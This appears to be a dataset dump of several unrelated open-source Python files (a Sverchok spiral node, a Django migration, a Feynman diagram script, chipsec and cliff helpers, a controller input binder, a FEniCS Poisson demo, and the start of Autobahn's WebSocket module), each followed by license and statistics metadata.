N = N * turns # total number of points in the spiral
es = prepareExponentialSettings(11, exponent + 1e-5) # used for easing
verts = []
norms = []
add_vert = verts.append
add_norm = norms.append
for n in range(N + 1):
t = n / N # t : [0, 1]
a = ExponentialEaseInOut(t, es) # ease radius variation (SIGMOID)
r = (iR + (eR - iR) * a) * scale
phi = max_phi * t + phase
x = r * cos(phi)
y = r * sin(phi)
z = height * t
add_vert([x, y, z])
edges = get_edge_list(N)
return verts, edges, norms
def make_spirangle_spiral(settings):
'''
eR : exterior radius (end radius)
iR : interior radius (start radius)
exponent : rate of growth
turns : number of turns in the spiral
N : curve resolution per turn
scale : overall scale of the curve
height : the height of the spiral along z
phase : phase the spiral around its center
flip : flip the spiral direction (default is CLOCKWISE)
'''
eR, iR, exponent, turns, N, scale, height, phase, flip = settings
sign = -1 if flip else 1 # flip direction ?
deltaA = 2 * pi / N * sign # angle increment
deltaE = exponent / N # exponent increment
deltaR = (eR + iR) # radius increment
deltaZ = height / (N * turns) # z increment
e = 0
r = iR
phi = phase
x, y, z = [0, 0, -deltaZ]
N = N * turns # total number of points in the spiral
verts = []
norms = []
add_vert = verts.append
add_norm = norms.append
for n in range(N + 1):
x = x + r * cos(phi) * scale
y = y + r * sin(phi) * scale
z = z + deltaZ
e = e + deltaE
r = r + deltaR * exp(e)
phi = phi + deltaA
add_vert([x, y, z])
edges = get_edge_list(N)
return verts, edges, norms
def normalize_spiral(verts, normalize_eR, eR, iR, scale):
'''
Normalize the spiral (XY) to either exterior or interior radius
'''
if normalize_eR: # normalize to exterior radius (ending radius)
psx = verts[-1][0] # x coordinate of the last point in the spiral
psy = verts[-1][1] # y coordinate of the last point in the spiral
r = sqrt(psx * psx + psy * psy)
ss = eR / r * scale if eR != 0 else 1
else: # normalize to interior radius (starting radius)
psx = verts[0][0] # x coordinate of the first point in the spiral
psy = verts[0][1] # y coordinate of the first point in the spiral
r = sqrt(psx * psx + psy * psy)
ss = iR / r * scale if iR != 0 else 1
for n in range(len(verts)):
verts[n][0] *= ss
verts[n][1] *= ss
return verts
class SvSpiralNodeMK2(bpy.types.Node, SverchCustomTreeNode, SvAngleHelper):
"""
Triggers: Spiral
Tooltip: Generate spiral curves
"""
bl_idname = 'SvSpiralNodeMK2'
bl_label = 'Spiral'
sv_icon = "SV_SPIRAL"
def update_angles(self, context, au):
''' Update all the angles to preserve their values in the new units '''
self.phase = self.phase * au
def update_spiral(self, context):
if self.updating:
return
self.presets = " "
updateNode(self, context)
def preset_items(self, context):
return [(k, k.title(), "", "", s[0]) for k, s in sorted(spiral_presets.items(), key=lambda k: k[1][0])]
def update_presets(self, context):
self.updating = True
if self.presets == " ":
self.updating = False
return
_, sT, eR, iR, e, t, N, s, h = spiral_presets[self.presets]
self.sType = sT
self.eRadius = eR
self.iRadius = iR
self.exponent = e
self.turns = t
self.resolution = N
self.scale = s
self.height = h
self.phase = 0.0
self.arms = 1
self.flip = False
self.separate = False
self.updating = False
updateNode(self, context)
presets: EnumProperty(
name="Presets", items=preset_items,
update=update_presets)
sType: EnumProperty(
name="Type", items=spiral_type_items,
default="ARCHIMEDEAN", update=update_spiral)
normalize: EnumProperty(
name="Normalize Radius", items=normalize_items,
default="ER", update=update_spiral)
iRadius: FloatProperty(
name="Interior Radius", description="Interior radius",
default=1.0, min=0.0, update=update_spiral)
eRadius: FloatProperty(
name="Exterior Radius", description="Exterior radius",
default=2.0, min=0.0, update=update_spiral)
turns: IntProperty(
name="Turns", description="Number of turns",
default=11, min=1, update=update_spiral)
arms: IntProperty(
name="Arms", description="Number of spiral arms",
default=1, min=1, update=update_spiral)
flip: BoolProperty(
name="Flip Direction", description="Flip spiral direction",
default=False, update=update_spiral)
scale: FloatProperty(
name="Scale", description="Scale spiral vertices",
default=1.0, update=update_spiral)
height: FloatProperty(
name="Height", description="Height of the spiral along z",
default=0.0, update=update_spiral)
phase: FloatProperty(
name="Phase", description="Phase amount around spiral center",
default=0.0, update=SvAngleHelper.update_angle)
exponent: FloatProperty(
name="Exponent", description="Exponent attenuator",
default=2.0, update=update_spiral)
resolution: IntProperty(
name="Turn Resolution", description="Number of vertices in one turn in the spiral",
default=100, min=3, update=update_spiral)
separate: BoolProperty(
name="Separate arms",
description="Separate the spiral arms",
default=False, update=update_spiral)
updating: BoolProperty(default=False) # used for disabling update callback
def migrate_from(self, old_node):
''' Migration from old nodes '''
if old_node.bl_idname == "SvSpiralNode":
self.sType = old_node.stype
self.last_angle_units = AngleUnits.RADIANS
self.angle_units = AngleUnits.RADIANS
def sv_init(self, context):
self.width = 170
self.inputs.new('SvStringsSocket', "R").prop_name = 'eRadius'
self.inputs.new('SvStringsSocket', "r").prop_name = 'iRadius'
self.inputs.new('SvStringsSocket', "e").prop_name = 'exponent'
self.inputs.new('SvStringsSocket', "t").prop_name = 'turns'
self.inputs.new('SvStringsSocket', "n").prop_name = 'resolution'
self.inputs.new('SvStringsSocket', "s").prop_name = 'scale'
self.inputs.new('SvStringsSocket', "h").prop_name = 'height'
self.inputs.new('SvStringsSocket', "p").prop_name = 'phase'
self.inputs.new('SvStringsSocket', "a").prop_name = 'arms'
self.outputs.new('SvVerticesSocket', "Vertices")
self.outputs.new('SvStringsSocket', "Edges")
self.presets = "ARCHIMEDEAN"
def draw_buttons(self, context, layout):
layout.prop(self, 'presets')
layout.prop(self, 'sType', text="")
col = layout.column(align=True)
if self.sType in ("LOGARITHMIC", "ARCHIMEDEAN", "SPIRANGLE"):
row = col.row(align=True)
row.prop(self, 'normalize', expand=True)
row = col.row(align=True)
row.prop(self, 'flip', text="Flip", toggle=True)
row.prop(self, 'separate', text="Separate", toggle=True)
def draw_buttons_ext(self, context, layout):
self.draw_angle_units_buttons(context, layout)
def process(self):
outputs = self.outputs
# return if no outputs are connected
if not any(s.is_linked for s in outputs):
return
# input values lists (single or multi value)
inputs = self.inputs
input_R = inputs["R"].sv_get()[0] # list of exterior radii
input_r = inputs["r"].sv_get()[0] # list of interior radii
input_e = inputs["e"].sv_get()[0] # list of exponents
input_t = inputs["t"].sv_get()[0] # list of turns
input_n = inputs["n"].sv_get()[0] # list of curve resolutions
input_s = inputs["s"].sv_get()[0] # list of scales
input_h = inputs["h"].sv_get()[0] # list of heights (z)
input_p = inputs["p"].sv_get()[0] # list of phases
input_a = inputs["a"].sv_get()[0] # list of arms
# sanitize the input
input_R = list(map(lambda x: max(0.0, x), input_R))
input_r = list(map(lambda x: max(0.0, x), input_r))
input_t = list(map(lambda x: max(1, int(x)), input_t))
input_n = list(map(lambda x: max(3, int(x)), input_n))
input_a = list(map(lambda x: max(1, int(x)), input_a))
# extra parameters
f = self.flip # flip direction
parameters = match_long_repeat([input_R, input_r, input_e, input_t,
input_n, input_s, input_h, input_p, input_a])
# conversion factor from the current angle units to radians
au = self.radians_conversion_factor()
make_spiral = eval("make_" + self.sType.lower() + "_spiral")
verts_list = []
edges_list = []
for R, r, e, t, n, s, h, p, a in zip(*parameters):
p = p * au
arm_verts = []
arm_edges = []
for i in range(a): # generate each arm
pa = p + 2 * pi / a * i
settings = [R, r, e, t, n, s, h, pa, f] # spiral settings
verts, edges, norms = make_spiral(settings)
if self.sType in ("LOGARITHMIC", "ARCHIMEDEAN", "SPIRANGLE"):
normalize_spiral(verts, self.normalize == "ER", R, r, s)
if self.separate:
arm_verts.append(verts)
arm_edges.append(edges)
else: # join the arms
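                    # offset the edge indices by the vertices gathered so far so they
                    # still reference the correct arm vertices after joining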
o = len(arm_verts)
edges = [[i1 + o, i2 + o] for (i1, i2) in edges]
arm_verts.extend(verts)
arm_edges.extend(edges)
verts_list.append(arm_verts)
edges_list.append(arm_edges)
self.outputs['Vertices'].sv_set(verts_list)
self.outputs['Edges'].sv_set(edges_list)
def register():
bpy.utils.register_class(SvSpiralNodeMK2)
def unregister():
bpy.utils.unregister_class(SvSpiralNodeMK2)
|
gpl-3.0
| -9,002,781,532,965,027,000
| 32.879389
| 111
| 0.567437
| false
| 3.223094
| false
| false
| false
|
EBI-Metagenomics/emgapi
|
emgapi/migrations/0028_auto_20200706_1823.py
|
1
|
1069
|
# -*- coding: utf-8 -*-
# Generated by Django 1.11.25 on 2020-06-16 12:02
from __future__ import unicode_literals
from django.db import migrations
def add_checksum_algorithms(apps, schema_editor):
"""
Add hash algorithms:
- SHA1
- SHA256
- MD5
"""
ChecksumAlgorithms = apps.get_model("emgapi", "ChecksumAlgorithm")
for alg in ["SHA1", "SHA256", "MD5"]:
ChecksumAlgorithms.objects.get_or_create(name=alg)
def remove_checksum_algorithms(apps, schema_editor):
"""
Remove hash algorithms:
- SHA1
- SHA256
- MD5
"""
ChecksumAlgorithms = apps.get_model("emgapi", "ChecksumAlgorithm")
for alg in ["SHA1", "SHA256", "MD5"]:
try:
ChecksumAlgorithms.objects.get(name=alg).delete()
except ChecksumAlgorithms.DoesNotExist:
pass
class Migration(migrations.Migration):
dependencies = [
('emgapi', '0027_auto_20200706_1823'),
]
operations = [
migrations.RunPython(add_checksum_algorithms, reverse_code=remove_checksum_algorithms)
]
|
apache-2.0
| 3,405,595,739,773,955,600
| 24.452381
| 94
| 0.637979
| false
| 3.587248
| false
| false
| false
|
itoijala/pyfeyner
|
examples/pyfeyn-test3.py
|
1
|
2416
|
#!/usr/bin/env python2
#
# pyfeyner - a simple Python interface for making Feynman diagrams.
# Copyright (C) 2005-2010 Andy Buckley, Georg von Hippel
# Copyright (C) 2013 Ismo Toijala
#
# pyfeyner is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# pyfeyner is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License along
# with pyfeyner; if not, write to the Free Software Foundation, Inc.,
# 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
#
## A B-meson colour-suppressed penguin decay diagram
# _
# in1 ------(_)------() out1a
# \ ____() out1b
# \(____
# () out2a
# in2 ---------------() out2b
#
from pyfeyner.user import *
import pyx
fd = FeynDiagram()
in1 = Point(1, 7)
loop_in = Vertex(4, 7)
loop_out = Vertex(7, 7)
out1a = Point(11, 7)
out1b = Point(11, 5)
in2 = Point(1, 0)
out2a = Point(11, 2)
out2b = Point(11, 0)
out1c = Vertex(out1b.x() - 2, out1b.y())
out1d = Vertex(out2a.x() - 2, out2a.y())
vtx = Vertex(out1c.midpoint(out1d).x() - 1.5, out1c.midpoint(out1d).y())
fd.add(Fermion(out2b, in2).addArrow().addLabel(r"\APdown"))
fd.add(Fermion(in1, loop_in).addArrow().addLabel(r"\Pbottom"))
fd.add(Fermion(loop_out, out1a).addArrow().addLabel(r"\Pstrange"))
fd.add(Photon(loop_in, loop_out).bend(-1.5).addLabel(r"\PWplus"))
f_loop, = fd.add(Fermion(loop_in, loop_out).bend(+1.5).addArrow() \
.addLabel(r"\Pup,\,\Pcharm,\,\Ptop"))
fd.add(Photon(f_loop.fracpoint(0.6), vtx).addLabel(r"\Pphoton/\PZ", displace=0.5).bend(0.5))
fd.add(Fermion(out1b, out1c).addArrow(0.8).addLabel(r"\APup"))
fd.add(Fermion(out1c, out1d).arcThru(vtx))
fd.add(Fermion(out1d, out2a).addArrow(0.2).addLabel(r"\Pup"))
fd.add(Ellipse(x=1, y=3.5, xradius=1, yradius=3.5).setFillStyle(pyx.pattern.crosshatched(0.1, 45)))
fd.add(Ellipse(x=11, y=6, xradius=0.6, yradius=1).setFillStyle(pyx.pattern.hatched135))
fd.add(Ellipse(x=11, y=1, xradius=0.6, yradius=1).setFillStyle(pyx.pattern.hatched135))
fd.draw("pyfeyn-test3.pdf")
|
gpl-2.0
| 8,639,295,022,185,520,000
| 36.75
| 99
| 0.678394
| false
| 2.511435
| false
| false
| false
|
johnloucaides/chipsec
|
chipsec/module_common.py
|
1
|
3593
|
#!/usr/bin/python
#CHIPSEC: Platform Security Assessment Framework
#Copyright (c) 2010-2015, Intel Corporation
#
#This program is free software; you can redistribute it and/or
#modify it under the terms of the GNU General Public License
#as published by the Free Software Foundation; Version 2.
#
#This program is distributed in the hope that it will be useful,
#but WITHOUT ANY WARRANTY; without even the implied warranty of
#MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
#GNU General Public License for more details.
#
#You should have received a copy of the GNU General Public License
#along with this program; if not, write to the Free Software
#Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
#
#Contact information:
#chipsec@intel.com
#
# -------------------------------------------------------------------------------
#
# CHIPSEC: Platform Hardware Security Assessment Framework
# (c) 2010-2012 Intel Corporation
#
# -------------------------------------------------------------------------------
"""
Common include file for modules
"""
import platform
import string
import sys
import os
from time import localtime, strftime
import chipsec.logger
import chipsec.chipset
import chipsec.defines
class ModuleResult:
FAILED = 0
PASSED = 1
WARNING = 2
SKIPPED = 3
DEPRECATED = 4
INFORMATION = 5
ERROR = -1
ModuleResultName = {
ModuleResult.FAILED: "Failed",
ModuleResult.PASSED: "Passed",
ModuleResult.WARNING: "Warning",
ModuleResult.SKIPPED: "Skipped",
ModuleResult.DEPRECATED: "Deprecated",
ModuleResult.INFORMATION: "Information",
ModuleResult.ERROR: "Error"
}
def getModuleResultName(res):
return ModuleResultName[res] if res in ModuleResultName else ModuleResultName[ModuleResult.ERROR]
class BaseModule(object):
def __init__(self):
self.cs = chipsec.chipset.cs()
self.logger = chipsec.logger.logger()
self.res = ModuleResult.PASSED
def is_supported(self):
"""
This method should be overwritten by the module returning True or False
depending whether or not this module is supported in the currently running
platform.
To access the currently running platform use
>>> self.cs.get_chipset_id()
"""
return True
def update_res(self, value):
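        # Results only get "worse": a WARNING may be replaced by FAILED or ERROR,
        # a FAILED only by ERROR, while INFORMATION and the initial PASSED/SKIPPED/
        # DEPRECATED states accept whatever value comes next.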
if self.res == ModuleResult.WARNING:
if value == ModuleResult.FAILED \
or value == ModuleResult.ERROR:
self.res = value
elif self.res == ModuleResult.FAILED:
if value == ModuleResult.ERROR:
self.res = value
elif self.res == ModuleResult.INFORMATION:
self.res = value
else: # PASSED or SKIPPED or DEPRECATED
self.res = value
def run(self, module_argv):
raise NotImplementedError('sub class should overwrite the run() method')
MTAG_BIOS = "BIOS"
MTAG_SMM = "SMM"
MTAG_SECUREBOOT = "SECUREBOOT"
MTAG_HWCONFIG = "HWCONFIG"
MTAG_CPU = "CPU"
##! [Available Tags]
MTAG_METAS = {
MTAG_BIOS: "System Firmware (BIOS/UEFI) Modules",
MTAG_SMM: "System Management Mode (SMM) Modules",
MTAG_SECUREBOOT: "Secure Boot Modules",
MTAG_HWCONFIG: "Hardware Configuration Modules",
MTAG_CPU: "CPU Modules",
}
##! [Available Tags]
MODULE_TAGS = dict( [(_tag, []) for _tag in MTAG_METAS])
#
# Common module command line options
#
OPT_MODIFY = 'modify'
|
gpl-2.0
| 2,244,424,559,796,795,000
| 27.515873
| 101
| 0.629001
| false
| 4.069083
| false
| false
| false
|
mbollmann/perceptron
|
mmb_perceptron/feature_extractor/generator/generative_extractor.py
|
1
|
3342
|
# -*- coding: utf-8 -*-
import numpy as np
from .. import FeatureExtractor
class GenerativeExtractor(FeatureExtractor):
"""Abstract base class for a generative feature extractor.
Compared to simple feature extractors, generators perform the additional
task of generating class label candidates. This means that they don't
return a single feature vector, but a dictionary mapping candidate classes
(for the classifier) to their respective feature vectors.
In terms of the perceptron algorithm, they combine the GEN() and Phi()
functions in a single object for ease of implementation.
"""
def _rebind_methods(self, status):
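        # Bind generate()/generate_vector() to the sequenced or the independent
        # implementations, depending on the status flag passed in.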
super(GenerativeExtractor, self)._rebind_methods(status)
if status:
self.generate = self._generate_sequenced
self.generate_vector = self._generate_vector_sequenced
else:
self.generate = self._generate_independent
self.generate_vector = self._generate_vector_independent
def _generate_independent(self, x, truth=None):
"""Return candidates and their feature representations.
Should return a tuple (F, C), where F is a list of feature
representations, and C is a list of class labels so that C[i] is the
class label belonging to the feature representation F[i].
During training, the **first element in these lists** is considered by
the perceptron to be the **correct class label** for this data point.
If the parameter 'truth' is supplied, it indicates the gold-standard
best candidate according to the training data; however, it is up to the
generator function whether to include this value as the first element of
the feature representations (thereby making the **gold standard** the
correct class label for the perceptron learner) or generate the
candidates independently and select an **oracle-best** class label from
those.
"""
raise NotImplementedError("function not implemented")
def _generate_sequenced(self, seq, pos, history=None, truth=None):
raise NotImplementedError("function not implemented")
def _generate_vector_independent(self, x, truth=None, grow=True):
"""Return candidates and their feature representations.
Identical to _generate_independent(), except that F is now a matrix of
numerical feature vectors.
"""
(features, labels) = self._generate_independent(x, truth=truth)
if grow:
for f in features:
self._label_mapper.extend(f)
vectors = np.array([self._label_mapper.map_to_vector(f) for f in features])
else:
vectors = np.array([self._label_mapper.get_vector(f) for f in features])
return (vectors, labels)
def _generate_vector_sequenced(self, seq, pos, history=None, truth=None, grow=True):
(features, labels) = \
self._generate_sequenced(seq, pos, history=history, truth=truth)
if grow:
for f in features:
self._label_mapper.extend(f)
vectors = np.array([self._label_mapper.map_to_vector(f) for f in features])
else:
vectors = np.array([self._label_mapper.get_vector(f) for f in features])
return (vectors, labels)
|
mit
| -3,316,705,741,891,611,600
| 44.162162
| 88
| 0.666966
| false
| 4.479893
| false
| false
| false
|
openstack/cliff
|
cliff/help.py
|
1
|
4846
|
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import argparse
import inspect
import traceback
from . import command
class HelpExit(SystemExit):
"""Special exception type to trigger quick exit from the application
We subclass from SystemExit to preserve API compatibility for
anything that used to catch SystemExit, but use a different class
so that cliff's Application can tell the difference between
something trying to hard-exit and help saying it's done.
"""
class HelpAction(argparse.Action):
"""Provide a custom action so the -h and --help options
to the main app will print a list of the commands.
The commands are determined by checking the CommandManager
instance, passed in as the "default" value for the action.
"""
def __call__(self, parser, namespace, values, option_string=None):
app = self.default
parser.print_help(app.stdout)
app.stdout.write('\nCommands:\n')
dists_by_module = command._get_distributions_by_modules()
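        # Resolve which distribution a command factory comes from, so commands
        # provided by packages other than the app itself can be annotated below.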
def dist_for_obj(obj):
name = inspect.getmodule(obj).__name__.partition('.')[0]
return dists_by_module.get(name)
app_dist = dist_for_obj(app)
command_manager = app.command_manager
for name, ep in sorted(command_manager):
try:
factory = ep.load()
except Exception:
app.stdout.write('Could not load %r\n' % ep)
if namespace.debug:
traceback.print_exc(file=app.stdout)
continue
try:
kwargs = {}
if 'cmd_name' in inspect.getfullargspec(factory.__init__).args:
kwargs['cmd_name'] = name
cmd = factory(app, None, **kwargs)
if cmd.deprecated:
continue
except Exception as err:
app.stdout.write('Could not instantiate %r: %s\n' % (ep, err))
if namespace.debug:
traceback.print_exc(file=app.stdout)
continue
one_liner = cmd.get_description().split('\n')[0]
dist_name = dist_for_obj(factory)
if dist_name and dist_name != app_dist:
dist_info = ' (' + dist_name + ')'
else:
dist_info = ''
app.stdout.write(' %-13s %s%s\n' % (name, one_liner, dist_info))
raise HelpExit()
class HelpCommand(command.Command):
"""print detailed help for another command
"""
def get_parser(self, prog_name):
parser = super(HelpCommand, self).get_parser(prog_name)
parser.add_argument('cmd',
nargs='*',
help='name of the command',
)
return parser
def take_action(self, parsed_args):
if parsed_args.cmd:
try:
the_cmd = self.app.command_manager.find_command(
parsed_args.cmd,
)
cmd_factory, cmd_name, search_args = the_cmd
except ValueError:
# Did not find an exact match
cmd = parsed_args.cmd[0]
fuzzy_matches = [k[0] for k in self.app.command_manager
if k[0].startswith(cmd)
]
if not fuzzy_matches:
raise
self.app.stdout.write('Command "%s" matches:\n' % cmd)
for fm in sorted(fuzzy_matches):
self.app.stdout.write(' %s\n' % fm)
return
self.app_args.cmd = search_args
kwargs = {}
if 'cmd_name' in inspect.getfullargspec(cmd_factory.__init__).args:
kwargs['cmd_name'] = cmd_name
cmd = cmd_factory(self.app, self.app_args, **kwargs)
full_name = (cmd_name
if self.app.interactive_mode
else ' '.join([self.app.NAME, cmd_name])
)
cmd_parser = cmd.get_parser(full_name)
cmd_parser.print_help(self.app.stdout)
else:
action = HelpAction(None, None, default=self.app)
action(self.app.parser, self.app.options, None, None)
return 0
|
apache-2.0
| -4,748,475,090,079,885,000
| 37.768
| 79
| 0.554065
| false
| 4.326786
| false
| false
| false
|
ApproxEng/approxeng.input
|
src/python/approxeng/input/selectbinder.py
|
1
|
6065
|
from functools import reduce
from select import select
from threading import Thread
import approxeng.input.sys as sys
from approxeng.input.controllers import *
EV_KEY = 1
EV_REL = 2
EV_ABS = 3
class ControllerResource:
"""
General resource which binds one or more controllers on entry and unbinds the event listening thread on exit.
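
    Typically used as a context manager, e.g. ``with ControllerResource() as controller: ...``;
    ``__enter__`` returns the single bound controller, or a tuple of controllers when more than
    one requirement was supplied.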
"""
def __init__(self, *requirements, print_events=False, **kwargs):
"""
Create a new resource to bind and access one or more controllers. If no additional arguments are supplied this
will find the first controller of any kind enabled by the library. Otherwise the requirements must be provided
as a list of ControllerRequirement
:param ControllerRequirement requirements:
ControllerRequirement instances used, in order, to find and bind controllers. If empty this will
be equivalent to supplying a single unfiltered requirement and will match the first specified controller.
:param bool print_events:
Defaults to False, if set to True then all events picked up by the binder will be printed to stdout. Use
this when you're trying to figure out what events correspond to what axes and buttons!
:param kwargs:
            Any additional keyword arguments are passed to the constructors for the controller classes. This is useful
particularly to specify e.g. dead and hot zone ranges on discovery.
:raises ControllerNotFoundError:
If the requirement can't be satisfied, or no requirements are specified but there aren't any controllers.
"""
self.discoveries = find_matching_controllers(*requirements, **kwargs)
self.unbind = None
self.print_events = print_events
def __enter__(self):
"""
Called on entering the resource block, returns the controller passed into the constructor.
"""
self.unbind = bind_controllers(*self.discoveries, print_events=self.print_events)
if len(self.discoveries) == 1:
return self.discoveries[0].controller
else:
return tuple(discovery.controller for discovery in self.discoveries)
def __exit__(self, exc_type, exc_value, traceback):
"""
Called on resource exit, unbinds the controller, removing the listening thread.
"""
self.unbind()
def bind_controllers(*discoveries, print_events=False):
"""
Bind a controller or controllers to a set of evdev InputDevice instances, starting a thread to keep those
controllers in sync with the state of the hardware.
:param ControllerDiscovery discoveries:
ControllerDiscovery instances specifying the controllers and their associated input devices
:param bool print_events:
Defaults to False, if set to True then all events picked up by this binder will be printed to stdout
:return:
A function which can be used to stop the event reading thread and unbind from the device
"""
discoveries = list(discoveries)
class SelectThread(Thread):
def __init__(self):
Thread.__init__(self, name='evdev select thread')
self.daemon = True
self.running = True
self.device_to_controller_discovery = {}
for discovery in discoveries:
for d in discovery.devices:
self.device_to_controller_discovery[d.fn] = discovery
self.all_devices = reduce(lambda x, y: x + y, [discovery.devices for discovery in discoveries])
def run(self):
for discovery in discoveries:
discovery.controller.device_unique_name = discovery.name
while self.running:
try:
r, w, x = select(self.all_devices, [], [], 0.5)
for fd in r:
active_device = fd
controller_discovery = self.device_to_controller_discovery[active_device.fn]
controller = controller_discovery.controller
controller_devices = controller_discovery.devices
prefix = None
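                        # Controllers that expose several evdev nodes map each node name to a
                        # prefix so axis/button codes from different nodes do not collide.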
if controller.node_mappings is not None and len(controller_devices) > 1:
try:
prefix = controller.node_mappings[active_device.name]
except KeyError:
pass
for event in active_device.read():
if print_events:
print(event)
if event.type == EV_ABS or event.type == EV_REL:
controller.axes.axis_updated(event, prefix=prefix)
elif event.type == EV_KEY:
# Button event
if event.value == 1:
# Button down
controller.buttons.button_pressed(event.code, prefix=prefix)
elif event.value == 0:
# Button up
controller.buttons.button_released(event.code, prefix=prefix)
except Exception as e:
self.stop(e)
def stop(self, exception=None):
for discovery in discoveries:
discovery.controller.device_unique_name = None
discovery.controller.exception = exception
self.running = False
polling_thread = SelectThread()
# Force an update of the LED and battery system cache
sys.scan_cache(force_update=True)
for device in polling_thread.all_devices:
device.grab()
def unbind():
polling_thread.stop()
for dev in polling_thread.all_devices:
try:
dev.ungrab()
except IOError:
pass
polling_thread.start()
return unbind
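# Lower-level flow sketch (illustrative, not part of the module): discover, bind,
# use and finally unbind controllers without the context manager above.
#
#   discoveries = find_matching_controllers()
#   unbind = bind_controllers(*discoveries, print_events=False)
#   try:
#       ...  # the background thread now keeps each discovery.controller in sync
#   finally:
#       unbind()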
|
apache-2.0
| -2,654,246,842,321,006,600
| 40.541096
| 118
| 0.591096
| false
| 5.131134
| false
| false
| false
|
akshmakov/Dolfin-Fijee-Fork
|
test/unit/book/python/chapter_1_files/stationary/poisson/d2_p2D.py
|
1
|
1457
|
"""
FEniCS tutorial demo program: Poisson equation with Dirichlet conditions.
As d1_p2D.py, but choosing the linear solver and preconditioner is demonstrated.
-Laplace(u) = f on the unit square.
u = u0 on the boundary.
u0 = u = 1 + x^2 + 2y^2, f = -6.
"""
from dolfin import *
# Create mesh and define function space
mesh = UnitSquareMesh(60, 40)
V = FunctionSpace(mesh, 'Lagrange', 1)
# Define boundary conditions
u0 = Expression('1 + x[0]*x[0] + 2*x[1]*x[1]')
def u0_boundary(x, on_boundary):
return on_boundary
bc = DirichletBC(V, u0, u0_boundary)
# Define variational problem
u = TrialFunction(V)
v = TestFunction(V)
f = Constant(-6.0)
a = inner(nabla_grad(u), nabla_grad(v))*dx
L = f*v*dx
# Compute solution
u = Function(V)
info(parameters, True)
prm = parameters['krylov_solver'] # short form
prm['absolute_tolerance'] = 1E-5
prm['relative_tolerance'] = 1E-3
prm['maximum_iterations'] = 1000
#prm['preconditioner']['ilu']['fill_level'] = 0
print parameters['linear_algebra_backend']
#set_log_level(PROGRESS)
set_log_level(DEBUG)
solve(a == L, u, bc,
solver_parameters={'linear_solver': 'cg',
'preconditioner': 'ilu'})
# Alternative syntax
solve(a == L, u, bc,
solver_parameters=dict(linear_solver='cg',
preconditioner='ilu'))
# Plot solution and mesh
#plot(u)
#plot(mesh)
# Dump solution to file in VTK format
file = File('poisson.pvd')
file << u
# Hold plot
interactive()
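# Optional verification sketch (not part of the original tutorial file): compare
# the computed solution with the exact expression u0 at the mesh vertices.
#import numpy
#u_e = interpolate(u0, V)
#print 'Max error:', numpy.abs(u_e.vector().array() - u.vector().array()).max()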
|
gpl-3.0
| -481,046,481,958,258,050
| 22.885246
| 75
| 0.663693
| false
| 2.840156
| false
| false
| false
|
danielfaust/AutobahnPython
|
autobahn/autobahn/websocket.py
|
1
|
140218
|
###############################################################################
##
## Copyright 2011,2012 Tavendo GmbH
##
## Licensed under the Apache License, Version 2.0 (the "License");
## you may not use this file except in compliance with the License.
## You may obtain a copy of the License at
##
## http://www.apache.org/licenses/LICENSE-2.0
##
## Unless required by applicable law or agreed to in writing, software
## distributed under the License is distributed on an "AS IS" BASIS,
## WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
## See the License for the specific language governing permissions and
## limitations under the License.
##
###############################################################################
## The Python urlparse module currently does not contain the ws/wss
## schemes, so we add those dynamically (which is a hack of course).
##
import urlparse
wsschemes = ["ws", "wss"]
urlparse.uses_relative.extend(wsschemes)
urlparse.uses_netloc.extend(wsschemes)
urlparse.uses_params.extend(wsschemes)
urlparse.uses_query.extend(wsschemes)
urlparse.uses_fragment.extend(wsschemes)
from twisted.internet import reactor, protocol
from twisted.python import log
import urllib
import binascii
import hashlib
import base64
import struct
import random
import os
from array import array
from collections import deque
from utf8validator import Utf8Validator
from xormasker import XorMaskerNull, XorMaskerSimple, XorMaskerShifted1
from httpstatus import *
import autobahn # need autobahn.version
def createWsUrl(hostname, port = None, isSecure = False, path = None, params = None):
"""
   Create a WebSocket URL from components.
:param hostname: WebSocket server hostname.
:type hostname: str
:param port: WebSocket service port or None (to select default ports 80/443 depending on isSecure).
:type port: int
:param isSecure: Set True for secure WebSockets ("wss" scheme).
:type isSecure: bool
:param path: Path component of addressed resource (will be properly URL escaped).
:type path: str
:param params: A dictionary of key-values to construct the query component of the addressed resource (will be properly URL escaped).
:type params: dict
:returns str -- Constructed WebSocket URL.
"""
if port is not None:
netloc = "%s:%d" % (hostname, port)
else:
if isSecure:
netloc = "%s:443" % hostname
else:
netloc = "%s:80" % hostname
if isSecure:
scheme = "wss"
else:
scheme = "ws"
if path is not None:
ppath = urllib.quote(path)
else:
ppath = "/"
if params is not None:
query = urllib.urlencode(params)
else:
query = None
return urlparse.urlunparse((scheme, netloc, ppath, None, query, None))
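## Illustrative sketch (not part of the original Autobahn API): compose a WebSocket
## URL for a made-up local server with one query parameter.
def _exampleCreateWsUrl():
   """
   Returns "ws://localhost:9000/chat?token=abc".
   """
   return createWsUrl("localhost", port = 9000, path = "/chat", params = {"token": "abc"})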
def parseWsUrl(url):
"""
   Parses a WebSocket URL into its components and returns a tuple (isSecure, host, port, resource, path, params).
isSecure is a flag which is True for wss URLs.
host is the hostname or IP from the URL.
port is the port from the URL or standard port derived from scheme (ws = 80, wss = 443).
resource is the /resource name/ from the URL, the /path/ together with the (optional) /query/ component.
path is the /path/ component properly unescaped.
   params is the /query/ component properly unescaped and returned as a dictionary.
:param url: A valid WebSocket URL, i.e. ws://localhost:9000/myresource?param1=23¶m2=666
:type url: str
:returns: tuple -- A tuple (isSecure, host, port, resource, path, params)
"""
parsed = urlparse.urlparse(url)
if parsed.scheme not in ["ws", "wss"]:
raise Exception("invalid WebSocket scheme '%s'" % parsed.scheme)
if parsed.port is None or parsed.port == "":
if parsed.scheme == "ws":
port = 80
else:
port = 443
else:
port = int(parsed.port)
if parsed.fragment is not None and parsed.fragment != "":
